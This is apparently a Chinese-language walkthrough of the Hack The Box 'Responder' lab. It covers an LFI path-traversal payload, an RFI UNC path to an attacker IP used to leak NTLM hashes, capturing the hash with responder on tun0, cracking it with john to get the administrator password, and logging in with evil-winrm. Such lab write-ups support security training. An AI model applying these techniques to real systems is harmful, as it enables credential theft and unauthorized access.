hack the box responder

使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?


服务器上使用哪种脚本语言来生成网页?

抓取返回包判断




用于加载网页不同语言版本的 URL 参数的名称是什么?

根据提示,切换语言,可以发现答案是page


“page”参数的以下哪一个值是利用本地文件包含 (LFI) 漏洞的示例:“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”


“page”参数的以下哪一个值是利用远程文件包含 (RFI) 漏洞的示例:“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”


NTLM 代表什么?

我们在响应程序实用程序中使用哪个标志来指定网络接口?

administrator用户的密码是什么?

回答:badminton
首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解
使用responder监听本地tun0网卡
responder -I tun0




john 破解hash



我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?


使用evil-winrm 进行登录


热门相关:骑士归来   寂静王冠   大神你人设崩了   马夫的孩子   继母2